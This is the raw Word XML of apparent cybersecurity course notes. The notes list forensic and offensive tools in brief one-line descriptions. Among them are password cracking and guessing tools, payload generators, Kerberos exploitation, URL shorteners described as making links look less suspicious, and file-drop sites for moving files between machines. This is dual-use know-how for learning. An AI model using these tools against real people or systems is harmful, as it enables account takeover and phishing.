      <w:r w:rsidR="0070252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07DB14"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A3BF58"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2B394"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1E4B6"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5F400"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8E72C7"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0AA8CD"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E2590D"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85D90C"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F66EA8"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9A886E"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21045D"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6B5943"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8169F" w14:textId="77777777" w:rsidR="009C77E4"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143868" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRPr="00A42FA5" w:rsidRDefault="009C77E4" w:rsidP="00A42FA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77D33A" w14:textId="3ACF1CCA" w:rsidR="00585246" w:rsidRDefault="00772D97" w:rsidP="00601DF1">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EEF14B0" w14:textId="2B1569E5" w:rsidR="00585246" w:rsidRPr="00294C81" w:rsidRDefault="00585246" w:rsidP="00585246">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Tools  information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54598F28" w14:textId="77777777"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OSForensics</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common tool to investigate files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD5DBC8" w14:textId="77777777"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Networkminer</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good tool for investigate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pcap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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495D50DC" w14:textId="77777777"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FTK imager – you can load to this tool file or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vmdk</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 and investigate them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB03C9E" w14:textId="2467BD1F" w:rsidR="00585246" w:rsidRDefault="00585246"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HxD</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You can load files to this tool and investigate files.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ctrl + G/F – for search inside the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You can use the tool for change headers/trailers then open file you could not before, sometimes you need to change the extension of the file in the name accordingly, windows know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find a file by the extension name in the contrary of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it possible to use the tool for search files inside the original file, as pdf files and more, find the blocks of header and trailer, copy all the blocks between them to new file and call this file with the appropriate extension then you could open the “hidden” file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019617A3" w14:textId="754ED532" w:rsidR="00D360F5" w:rsidRDefault="00585246" w:rsidP="00D360F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Event </w:t>
      </w:r>
      <w:r w:rsidR="00D360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iewer – you can see all kind of activities that happen on the machine, we use that for watch on anomaly in the network</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security field</w:t>
      </w:r>
      <w:r w:rsidR="00D360F5">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most used, and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enable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see security stuff as log of users, when user fail to log, add user to domain, and more.</w:t>
      </w:r>
      <w:r w:rsidR="0089352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use ctrl + f to search for strings (search even inside the events)</w:t>
      </w:r>
      <w:r w:rsidR="0089352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also filter option of the tool to search for certain id event and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A34AF3A" w14:textId="77777777" w:rsidR="002D17B5" w:rsidRDefault="00D360F5" w:rsidP="00D360F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Security Policy – the place we define which kind of actions will appear in event viewer, we want the less we can for there will not be too much noise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7459B7" w14:textId="77777777" w:rsidR="002D17B5" w:rsidRDefault="002D17B5" w:rsidP="00D360F5">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PEView</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 tool that help us to find if a file packed or encrypted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDAF696" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="002D17B5"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Procmon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process monitor, show us software that running on the machine, and resources the software uses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F15EDE4"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5C6DCD"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213A13"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194F50"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1203CB"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70B1A"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09DF02"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7194C"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4D9925"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DC88EB"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7542C1" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4"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D15B71" w14:textId="2F7D6415" w:rsidR="006D0E34" w:rsidRDefault="00772D97" w:rsidP="0036430B">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1A05E09" w14:textId="30083C46" w:rsidR="002D166C" w:rsidRPr="00294C81" w:rsidRDefault="006D0E34" w:rsidP="002D166C">
      <w:pPr>
        <w:jc w:val="cente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iCs/>
          <w:color w:val="FF000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Extra information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A4B571" w14:textId="09806901" w:rsidR="00AD5A99" w:rsidRDefault="00806014" w:rsidP="0043077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AD5A9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 user</w:t>
      </w:r>
      <w:r w:rsidR="00AD5A9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 root user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE4211B" w14:textId="3FCF809E" w:rsidR="0043077E" w:rsidRDefault="0043077E" w:rsidP="0043077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tmp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stores temporary files</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/home – where all the home directories of all the users are found</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/var – variable data files such log files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local system configuration file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/boot – files required to boot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/bin – contains a lot of commands as ls, rm and more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7F00AD" w14:textId="161C0A13" w:rsidR="005033DB" w:rsidRDefault="005033DB" w:rsidP="0043077E">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 Authority/system – the strongest user in windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCF1014" w14:textId="59C4EEF8" w:rsidR="00AD5A99" w:rsidRDefault="00D232DD"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irustotal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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you can load file or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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spellEnd"/>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it checks it </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006749F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 if the file found problematic in the past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Any.run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you can scan virus through this site but oppose to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virustotal</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site is not save what you upload in its DB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBBB67F" w14:textId="77777777" w:rsidR="00AD5A99" w:rsidRDefault="006749F7"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cyberchef</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site that helps in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convertions</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bases like from hex to binary, from base 64, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A8226A" w14:textId="77777777" w:rsidR="00AD5A99" w:rsidRDefault="006749F7"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crackstation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site for crack passwords, solve hashes a lot the john does not succeeds (on its default file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49381950" w14:textId="77777777" w:rsidR="0088672A" w:rsidRDefault="00772D97"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shodan</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site for passive scans,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its own syntax,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org: and hostname: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robots.txt – prevents index of google.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE18DDF" w14:textId="77777777" w:rsidR="003A3976" w:rsidRDefault="0088672A"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Cupp -I – tool that ask questions as the name of the dog and more for creates possible passwords, for install in you need to write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enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2282A361" w14:textId="206C9C13" w:rsidR="001C0EBD" w:rsidRDefault="001C0EBD"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TheFatRat – tool for creating payloads, it also cooperate with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msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3EB0F085" w14:textId="46CF7A92" w:rsidR="000E13AB" w:rsidRDefault="000E13AB"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Kerberute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tool for exploit the Kerberos protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4334E083" w14:textId="5BF3F7A2" w:rsidR="00D80B1B" w:rsidRDefault="00D80B1B"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Garry Kessler – site that shows headers and trailers by type of files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A18A9D1" w14:textId="7C448467" w:rsidR="00585246" w:rsidRDefault="00655DAB"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minutes mail – site that give you mail to use for 10 minutes, if you want to enter a site without to sign</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32914926" w14:textId="1AE4E311" w:rsidR="00540DD2" w:rsidRDefault="00540DD2"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tinyURL</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site that get as input URL and output tiny URL, reduce the size of URL and enable us to make URL less suspicious</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B54D2B8" w14:textId="65023E98" w:rsidR="00B4458F" w:rsidRDefault="00B4458F"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file.io – a site that can host out file for temporary time (could use for transfer files between two machines)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6298815D" w14:textId="6C20219C" w:rsidR="00A30CDC" w:rsidRDefault="00A30CDC"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certutil</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tool that convert exe to bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB83F21" w14:textId="5EF8B1EC" w:rsidR="00A25F69" w:rsidRDefault="00A25F69"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Glassdoor – anonymous criticism on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hitech</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companies </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AC08BB" w14:textId="0113DE2F" w:rsidR="00D00FB0" w:rsidRDefault="00D00FB0"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Hak5 – cool site that contains components for hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B55B29" w14:textId="5975E358" w:rsidR="003D6D1D" w:rsidRDefault="003D6D1D"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Viewdns.info – a site that get as input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domain and returns data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780B699B" w14:textId="43B19448" w:rsidR="003D6D1D" w:rsidRDefault="003D6D1D"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Dorksearch.com </w:t>
      </w:r>
      <w:r w:rsidR="00BD11C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11C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site that build the query of google dorks by the info you enter him about what you want to find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699C2995" w14:textId="53FE5A6E" w:rsidR="00D00FB0" w:rsidRDefault="00D00FB0"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Rabbit Hole – Ai for hackers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76921AF4" w14:textId="6223F295" w:rsidR="005C6F18" w:rsidRDefault="005C6F18"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Htttrack</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tool that can extract all the pages behind a site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httrack</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3" w:history="1">
        <w:r w:rsidRPr="00F975F8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>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https://www.johnbryce.co.il</w:t>
        </w:r>
      </w:hyperlink>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take all the pages behind this site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040D7B18" w14:textId="7DEE9B43" w:rsidR="00C23D7B" w:rsidRDefault="00C23D7B"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Blackbox – investigate as PT and get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lil</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as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subnet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greybox</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investigate as PT and get mediocre info as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domains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urls</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more.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whitebox</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investigate as PT and get a lot of info, even users sometimes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B34819" w14:textId="2379E350" w:rsidR="0043739B" w:rsidRDefault="0043739B"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OSINT – search info on internet in bare places (passive investiga</w:t>
      </w:r>
      <w:r w:rsidR="0018066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ion)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3684E642" w14:textId="751DC585" w:rsidR="00032DDE" w:rsidRDefault="00032DDE"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Burpsuite</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tool for web scanning, you can use also brute force on a site using that tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5F1178" w14:textId="64426AE5" w:rsidR="00A25F69" w:rsidRDefault="00A25F69" w:rsidP="0058524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Nessus – strong tool that scan similar to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has its advantages and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r w:rsidR="003E0EA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spellEnd"/>
    </w:p>
    <w:p w14:paraId="002D4975" w14:textId="39164394" w:rsidR="00685BB6" w:rsidRDefault="00685BB6" w:rsidP="00685BB6">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Samba – meaning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smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="50FBD374" w14:textId="7B1ECFCD" w:rsidR="00592E6C" w:rsidRDefault="00592E6C"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Warning – when using recursion you need to put return sometimes in the right place</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otherwise the function can continue again after it reached to the end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E29C63" w14:textId="39198618" w:rsidR="00ED15CF" w:rsidRDefault="00ED15CF"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Pwsh</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powershell</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if write it in terminal or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 open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powershell</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shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3522FADD" w14:textId="52369397" w:rsidR="009A1845" w:rsidRDefault="009A1845"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difference between portable file or installer file is the installer you are install on the computer what take more time and you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cant</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 it with disk on key, and sometimes you don’t have the permissions to install in on the computer, but it found on the computer which have faster abilities and more comfortable to use, on the contrary the portable file is a file that can run without install permissions, and you can pass it on disk on key</w:t>
      </w:r>
      <w:r w:rsidR="000B0A5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DA4091" w14:textId="23301916" w:rsidR="00897B79" w:rsidRPr="00897B79" w:rsidRDefault="00897B79"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enter inside share directory of windows we can write in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place of path in the directory the path, like smb://10.10.10.10/c$/ then we will need to enter user and password and we can enter the directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0209A199" w14:textId="56554949" w:rsidR="00ED1CCC" w:rsidRDefault="00ED1CCC"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 language that web developers are using</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5934F748" w14:textId="4C63059E" w:rsidR="00662F80" w:rsidRDefault="00662F80"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NBNS,DNS,LLMNR – all of them protocol for name resolution </w:t>
      </w:r>
      <w:r w:rsidR="003618C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DHCP – contains hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052626AB"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6F673F"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FCA5B"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2147A"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870BB1" w14:textId="77777777" w:rsidR="002B6713" w:rsidRDefault="002B6713" w:rsidP="007D60FA">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3D3095" w14:textId="464CD838" w:rsidR="005E279D" w:rsidRPr="00296C76" w:rsidRDefault="0088672A" w:rsidP="00AD5A99">
      <w:pPr>
        <w:jc w:val="right"/>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D75C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3F7FEB0" w14:textId="77777777" w:rsidR="00136837" w:rsidRPr="00136837" w:rsidRDefault="00136837" w:rsidP="00136837">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>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36837" w:rsidRPr="00136837" w:rsidSect="00E17D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4E41"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="83083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E4B1C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6474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64AE2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7108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7626D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="13060FE0"/>
    <w:lvl w:ilvl="0" w:tplc="985C7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91735B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BE58DEBA"/>
    <w:lvl w:ilvl="0" w:tplc="9C18E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99677258">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1971741777">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="382022606">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="262499376">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1770812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DE"/>
    <w:rsid w:val="000042E7"/>
    <w:rsid w:val="00010244"/>
    <w:rsid w:val="000104DD"/>
    <w:rsid w:val="000120DF"/>
    <w:rsid w:val="000164C5"/>
    <w:rsid w:val="00021236"/>
    <w:rsid w:val="00021B18"/>
    <w:rsid w:val="00024C40"/>
    <w:rsid w:val="00026823"/>
    <w:rsid w:val="00032DDE"/>
    <w:rsid w:val="00042906"/>
    <w:rsid w:val="00045548"/>
    <w:rsid w:val="0005505E"/>
    <w:rsid w:val="00056771"/>
    <w:rsid w:val="0005741C"/>
    <w:rsid w:val="00061C0E"/>
    <w:rsid w:val="00065E66"/>
    <w:rsid w:val="00074A8B"/>
    <w:rsid w:val="000906A3"/>
    <w:rsid w:val="00090CBC"/>
    <w:rsid w:val="00093FDF"/>
    <w:rsid w:val="0009466A"/>
    <w:rsid w:val="000A0D7F"/>
    <w:rsid w:val="000B0A5C"/>
    <w:rsid w:val="000C1525"/>
    <w:rsid w:val="000C387E"/>
    <w:rsid w:val="000D08CD"/>
    <w:rsid w:val="000D0B27"/>
    <w:rsid w:val="000D38A6"/>
    <w:rsid w:val="000D4F85"/>
    <w:rsid w:val="000D61EA"/>
    <w:rsid w:val="000E13AB"/>
    <w:rsid w:val="000E1FB5"/>
    <w:rsid w:val="000E6152"/>
    <w:rsid w:val="000F11FF"/>
    <w:rsid w:val="001038E7"/>
    <w:rsid w:val="00105047"/>
    <w:rsid w:val="00110024"/>
    <w:rsid w:val="00115F48"/>
    <w:rsid w:val="00130E25"/>
    <w:rsid w:val="00131B33"/>
    <w:rsid w:val="00132564"/>
    <w:rsid w:val="00134126"/>
    <w:rsid w:val="00136837"/>
    <w:rsid w:val="001418A0"/>
    <w:rsid w:val="00165101"/>
    <w:rsid w:val="00170589"/>
    <w:rsid w:val="0017417B"/>
    <w:rsid w:val="00180663"/>
    <w:rsid w:val="001A42D8"/>
    <w:rsid w:val="001A6FC4"/>
    <w:rsid w:val="001C0EBD"/>
    <w:rsid w:val="001C5241"/>
    <w:rsid w:val="001D0E2C"/>
    <w:rsid w:val="001E10F4"/>
    <w:rsid w:val="001E4F28"/>
    <w:rsid w:val="001E6FD2"/>
    <w:rsid w:val="001F05FB"/>
    <w:rsid w:val="001F44E7"/>
    <w:rsid w:val="002010E1"/>
    <w:rsid w:val="00201A21"/>
    <w:rsid w:val="002170DA"/>
    <w:rsid w:val="00220A8C"/>
    <w:rsid w:val="00220C1F"/>
    <w:rsid w:val="00227792"/>
    <w:rsid w:val="00233685"/>
    <w:rsid w:val="00255438"/>
    <w:rsid w:val="00260CB4"/>
    <w:rsid w:val="00265644"/>
    <w:rsid w:val="00294C81"/>
    <w:rsid w:val="00296C76"/>
    <w:rsid w:val="00297646"/>
    <w:rsid w:val="002A6727"/>
    <w:rsid w:val="002B6713"/>
    <w:rsid w:val="002C1548"/>
    <w:rsid w:val="002C5B72"/>
    <w:rsid w:val="002C7E3B"/>
    <w:rsid w:val="002D166C"/>
    <w:rsid w:val="002D17B5"/>
    <w:rsid w:val="002D2B47"/>
    <w:rsid w:val="002D35E9"/>
    <w:rsid w:val="002D7121"/>
    <w:rsid w:val="002F0752"/>
    <w:rsid w:val="002F4F3E"/>
    <w:rsid w:val="002F5701"/>
    <w:rsid w:val="002F60DB"/>
    <w:rsid w:val="003000B5"/>
    <w:rsid w:val="00326F43"/>
    <w:rsid w:val="00327EAE"/>
    <w:rsid w:val="00337BF7"/>
    <w:rsid w:val="00340595"/>
    <w:rsid w:val="003467DE"/>
    <w:rsid w:val="00360534"/>
    <w:rsid w:val="003618C0"/>
    <w:rsid w:val="00361DDD"/>
    <w:rsid w:val="0036430B"/>
    <w:rsid w:val="003715FF"/>
    <w:rsid w:val="00371819"/>
    <w:rsid w:val="00372529"/>
    <w:rsid w:val="003728BE"/>
    <w:rsid w:val="003907BC"/>
    <w:rsid w:val="00390A2E"/>
    <w:rsid w:val="0039333C"/>
    <w:rsid w:val="003A088F"/>
    <w:rsid w:val="003A2A80"/>
    <w:rsid w:val="003A3976"/>
    <w:rsid w:val="003A5B81"/>
    <w:rsid w:val="003B1C01"/>
    <w:rsid w:val="003B35C9"/>
    <w:rsid w:val="003C1974"/>
    <w:rsid w:val="003C2A98"/>
    <w:rsid w:val="003D0295"/>
    <w:rsid w:val="003D0B21"/>
    <w:rsid w:val="003D0EAF"/>
    <w:rsid w:val="003D3CFF"/>
    <w:rsid w:val="003D50FC"/>
    <w:rsid w:val="003D5CCB"/>
    <w:rsid w:val="003D6D1D"/>
    <w:rsid w:val="003E0EA2"/>
    <w:rsid w:val="003E0F51"/>
    <w:rsid w:val="00406BD8"/>
    <w:rsid w:val="00407DB3"/>
    <w:rsid w:val="0041017E"/>
    <w:rsid w:val="00412636"/>
    <w:rsid w:val="00425D14"/>
    <w:rsid w:val="00425FB7"/>
    <w:rsid w:val="00426AC0"/>
    <w:rsid w:val="0043077E"/>
    <w:rsid w:val="0043317B"/>
    <w:rsid w:val="0043739B"/>
    <w:rsid w:val="0044046E"/>
    <w:rsid w:val="004456B5"/>
    <w:rsid w:val="00460961"/>
    <w:rsid w:val="00460AF6"/>
    <w:rsid w:val="00461CCA"/>
    <w:rsid w:val="00475987"/>
    <w:rsid w:val="004772A3"/>
    <w:rsid w:val="00480370"/>
    <w:rsid w:val="00495A6E"/>
    <w:rsid w:val="004B172E"/>
    <w:rsid w:val="004B7459"/>
    <w:rsid w:val="004C174E"/>
    <w:rsid w:val="004E119A"/>
    <w:rsid w:val="004E7214"/>
    <w:rsid w:val="005000CB"/>
    <w:rsid w:val="005017A7"/>
    <w:rsid w:val="00502E69"/>
    <w:rsid w:val="005033DB"/>
    <w:rsid w:val="0052648E"/>
    <w:rsid w:val="00531FCC"/>
    <w:rsid w:val="0053370D"/>
    <w:rsid w:val="00540DD2"/>
    <w:rsid w:val="005578F8"/>
    <w:rsid w:val="00563E0A"/>
    <w:rsid w:val="0056512E"/>
    <w:rsid w:val="005675ED"/>
    <w:rsid w:val="005832B0"/>
    <w:rsid w:val="00585246"/>
    <w:rsid w:val="005855F8"/>
    <w:rsid w:val="00586BFC"/>
    <w:rsid w:val="00592E6C"/>
    <w:rsid w:val="00596447"/>
    <w:rsid w:val="005A3156"/>
    <w:rsid w:val="005C2B40"/>
    <w:rsid w:val="005C5093"/>
    <w:rsid w:val="005C6F18"/>
    <w:rsid w:val="005E279D"/>
    <w:rsid w:val="005E6285"/>
    <w:rsid w:val="005E6FE5"/>
    <w:rsid w:val="00601862"/>
    <w:rsid w:val="00601DF1"/>
    <w:rsid w:val="00605A20"/>
    <w:rsid w:val="00613EAF"/>
    <w:rsid w:val="00614931"/>
    <w:rsid w:val="00620850"/>
    <w:rsid w:val="0062161E"/>
    <w:rsid w:val="00623466"/>
    <w:rsid w:val="0062373E"/>
    <w:rsid w:val="00634FC1"/>
    <w:rsid w:val="00647E23"/>
    <w:rsid w:val="0065544A"/>
    <w:rsid w:val="00655DAB"/>
    <w:rsid w:val="00660D7F"/>
    <w:rsid w:val="0066281F"/>
    <w:rsid w:val="00662F80"/>
    <w:rsid w:val="00670C38"/>
    <w:rsid w:val="00672E38"/>
    <w:rsid w:val="006749F7"/>
    <w:rsid w:val="00684BDD"/>
    <w:rsid w:val="00685BB6"/>
    <w:rsid w:val="0069419E"/>
    <w:rsid w:val="00697594"/>
    <w:rsid w:val="00697957"/>
    <w:rsid w:val="006A7925"/>
    <w:rsid w:val="006B420E"/>
    <w:rsid w:val="006C0698"/>
    <w:rsid w:val="006C60E7"/>
    <w:rsid w:val="006C63AB"/>
    <w:rsid w:val="006C7522"/>
    <w:rsid w:val="006D0E34"/>
    <w:rsid w:val="006D297C"/>
    <w:rsid w:val="006D49FC"/>
    <w:rsid w:val="006D75C9"/>
    <w:rsid w:val="006E5D31"/>
    <w:rsid w:val="006F0038"/>
    <w:rsid w:val="006F40E6"/>
    <w:rsid w:val="006F50F4"/>
    <w:rsid w:val="00702525"/>
    <w:rsid w:val="0072035A"/>
    <w:rsid w:val="00723AB1"/>
    <w:rsid w:val="007255CC"/>
    <w:rsid w:val="00726FC1"/>
    <w:rsid w:val="00730659"/>
    <w:rsid w:val="0074350B"/>
    <w:rsid w:val="00752E0F"/>
    <w:rsid w:val="007676FF"/>
    <w:rsid w:val="0077103E"/>
    <w:rsid w:val="00772D97"/>
    <w:rsid w:val="00786159"/>
    <w:rsid w:val="007B0372"/>
    <w:rsid w:val="007B255B"/>
    <w:rsid w:val="007B4EEE"/>
    <w:rsid w:val="007C290D"/>
    <w:rsid w:val="007D60FA"/>
    <w:rsid w:val="007E7A84"/>
    <w:rsid w:val="007F4170"/>
    <w:rsid w:val="00800C80"/>
    <w:rsid w:val="0080350A"/>
    <w:rsid w:val="00804B18"/>
    <w:rsid w:val="00806014"/>
    <w:rsid w:val="00810F6C"/>
    <w:rsid w:val="008110CE"/>
    <w:rsid w:val="00813496"/>
    <w:rsid w:val="00813D0D"/>
    <w:rsid w:val="008154F1"/>
    <w:rsid w:val="00817295"/>
    <w:rsid w:val="00847C8A"/>
    <w:rsid w:val="00873EBB"/>
    <w:rsid w:val="00882BF3"/>
    <w:rsid w:val="00883A17"/>
    <w:rsid w:val="0088672A"/>
    <w:rsid w:val="00892789"/>
    <w:rsid w:val="0089352E"/>
    <w:rsid w:val="00897B79"/>
    <w:rsid w:val="008A0F76"/>
    <w:rsid w:val="008A3638"/>
    <w:rsid w:val="008A5775"/>
    <w:rsid w:val="008A6D1E"/>
    <w:rsid w:val="008A7727"/>
    <w:rsid w:val="008C066C"/>
    <w:rsid w:val="008C1582"/>
    <w:rsid w:val="008C3FDF"/>
    <w:rsid w:val="008D1514"/>
    <w:rsid w:val="008D2D4C"/>
    <w:rsid w:val="008D2F34"/>
    <w:rsid w:val="008D404F"/>
    <w:rsid w:val="008E373A"/>
    <w:rsid w:val="008E3BEF"/>
    <w:rsid w:val="008E6B86"/>
    <w:rsid w:val="008E7552"/>
    <w:rsid w:val="008F37CD"/>
    <w:rsid w:val="009163B0"/>
    <w:rsid w:val="00920AE9"/>
    <w:rsid w:val="009270C0"/>
    <w:rsid w:val="00930780"/>
    <w:rsid w:val="00930AF1"/>
    <w:rsid w:val="00933DDE"/>
    <w:rsid w:val="009364DF"/>
    <w:rsid w:val="00940D3C"/>
    <w:rsid w:val="0094127D"/>
    <w:rsid w:val="00943D30"/>
    <w:rsid w:val="00950D1D"/>
    <w:rsid w:val="00952985"/>
    <w:rsid w:val="0096541F"/>
    <w:rsid w:val="009775E5"/>
    <w:rsid w:val="00980E0E"/>
    <w:rsid w:val="00980E58"/>
    <w:rsid w:val="0098268D"/>
    <w:rsid w:val="00987E1B"/>
    <w:rsid w:val="009A1845"/>
    <w:rsid w:val="009A296D"/>
    <w:rsid w:val="009A2FE7"/>
    <w:rsid w:val="009B1FA0"/>
    <w:rsid w:val="009C77E4"/>
    <w:rsid w:val="009D0E12"/>
    <w:rsid w:val="009D25B0"/>
    <w:rsid w:val="009D4D4B"/>
    <w:rsid w:val="009E0CBD"/>
    <w:rsid w:val="009E3A59"/>
    <w:rsid w:val="009E75D5"/>
    <w:rsid w:val="009F3651"/>
    <w:rsid w:val="00A01C63"/>
    <w:rsid w:val="00A16267"/>
    <w:rsid w:val="00A16B3E"/>
    <w:rsid w:val="00A25701"/>
    <w:rsid w:val="00A25F69"/>
    <w:rsid w:val="00A27EB3"/>
    <w:rsid w:val="00A30CDC"/>
    <w:rsid w:val="00A36FBE"/>
    <w:rsid w:val="00A37D8C"/>
    <w:rsid w:val="00A42FA5"/>
    <w:rsid w:val="00A47F17"/>
    <w:rsid w:val="00A503FD"/>
    <w:rsid w:val="00A625A1"/>
    <w:rsid w:val="00A664C2"/>
    <w:rsid w:val="00A716BA"/>
    <w:rsid w:val="00A71BB3"/>
    <w:rsid w:val="00A74E5E"/>
    <w:rsid w:val="00A80D19"/>
    <w:rsid w:val="00AA1546"/>
    <w:rsid w:val="00AA413F"/>
    <w:rsid w:val="00AB08CB"/>
    <w:rsid w:val="00AC0D7D"/>
    <w:rsid w:val="00AC2D8D"/>
    <w:rsid w:val="00AC4B75"/>
    <w:rsid w:val="00AD3C26"/>
    <w:rsid w:val="00AD5A99"/>
    <w:rsid w:val="00AD7813"/>
    <w:rsid w:val="00AE7481"/>
    <w:rsid w:val="00B01DEA"/>
    <w:rsid w:val="00B02F1C"/>
    <w:rsid w:val="00B0335A"/>
    <w:rsid w:val="00B102B3"/>
    <w:rsid w:val="00B106EC"/>
    <w:rsid w:val="00B1107D"/>
    <w:rsid w:val="00B150B7"/>
    <w:rsid w:val="00B215E0"/>
    <w:rsid w:val="00B268F8"/>
    <w:rsid w:val="00B30837"/>
    <w:rsid w:val="00B30D0C"/>
    <w:rsid w:val="00B30F5D"/>
    <w:rsid w:val="00B31BEF"/>
    <w:rsid w:val="00B369D0"/>
    <w:rsid w:val="00B4458F"/>
    <w:rsid w:val="00B53A54"/>
    <w:rsid w:val="00B634A3"/>
    <w:rsid w:val="00B64404"/>
    <w:rsid w:val="00B75E87"/>
    <w:rsid w:val="00B7689F"/>
    <w:rsid w:val="00B77A37"/>
    <w:rsid w:val="00B839D5"/>
    <w:rsid w:val="00B87F1F"/>
    <w:rsid w:val="00B95301"/>
    <w:rsid w:val="00B97BF5"/>
    <w:rsid w:val="00BB17D9"/>
    <w:rsid w:val="00BC0DD1"/>
    <w:rsid w:val="00BD11C3"/>
    <w:rsid w:val="00BD1A97"/>
    <w:rsid w:val="00BD4340"/>
    <w:rsid w:val="00BF7833"/>
    <w:rsid w:val="00C00D12"/>
    <w:rsid w:val="00C1032A"/>
    <w:rsid w:val="00C11F4F"/>
    <w:rsid w:val="00C15324"/>
    <w:rsid w:val="00C23D7B"/>
    <w:rsid w:val="00C30858"/>
    <w:rsid w:val="00C331AC"/>
    <w:rsid w:val="00C37C9A"/>
    <w:rsid w:val="00C4394F"/>
    <w:rsid w:val="00C44632"/>
    <w:rsid w:val="00C4612C"/>
    <w:rsid w:val="00C567D6"/>
    <w:rsid w:val="00C62672"/>
    <w:rsid w:val="00C8563B"/>
    <w:rsid w:val="00C874E8"/>
    <w:rsid w:val="00C95C68"/>
    <w:rsid w:val="00C97ECA"/>
    <w:rsid w:val="00CA2A19"/>
    <w:rsid w:val="00CC2CFA"/>
    <w:rsid w:val="00CC4C4B"/>
    <w:rsid w:val="00CC6C94"/>
    <w:rsid w:val="00CC796D"/>
    <w:rsid w:val="00CD1987"/>
    <w:rsid w:val="00CD1EAB"/>
    <w:rsid w:val="00CD2538"/>
    <w:rsid w:val="00CD32C1"/>
    <w:rsid w:val="00CE32EB"/>
    <w:rsid w:val="00CE3331"/>
    <w:rsid w:val="00CF33F1"/>
    <w:rsid w:val="00CF3565"/>
    <w:rsid w:val="00CF6334"/>
    <w:rsid w:val="00CF6E4C"/>
    <w:rsid w:val="00D00FB0"/>
    <w:rsid w:val="00D14135"/>
    <w:rsid w:val="00D15AE0"/>
    <w:rsid w:val="00D232DD"/>
    <w:rsid w:val="00D27AC8"/>
    <w:rsid w:val="00D360F5"/>
    <w:rsid w:val="00D372E2"/>
    <w:rsid w:val="00D37B8F"/>
    <w:rsid w:val="00D521CF"/>
    <w:rsid w:val="00D5584C"/>
    <w:rsid w:val="00D80B1B"/>
    <w:rsid w:val="00D80EF2"/>
    <w:rsid w:val="00D841C6"/>
    <w:rsid w:val="00D8498F"/>
    <w:rsid w:val="00D85A07"/>
    <w:rsid w:val="00D87A16"/>
    <w:rsid w:val="00D924ED"/>
    <w:rsid w:val="00DB41C9"/>
    <w:rsid w:val="00DD7DC9"/>
    <w:rsid w:val="00DE0241"/>
    <w:rsid w:val="00DE253C"/>
    <w:rsid w:val="00E0359F"/>
    <w:rsid w:val="00E12743"/>
    <w:rsid w:val="00E17DBC"/>
    <w:rsid w:val="00E204D2"/>
    <w:rsid w:val="00E254BD"/>
    <w:rsid w:val="00E33098"/>
    <w:rsid w:val="00E34555"/>
    <w:rsid w:val="00E41A27"/>
    <w:rsid w:val="00E42462"/>
    <w:rsid w:val="00E45354"/>
    <w:rsid w:val="00E52D0A"/>
    <w:rsid w:val="00E7040D"/>
    <w:rsid w:val="00E706C9"/>
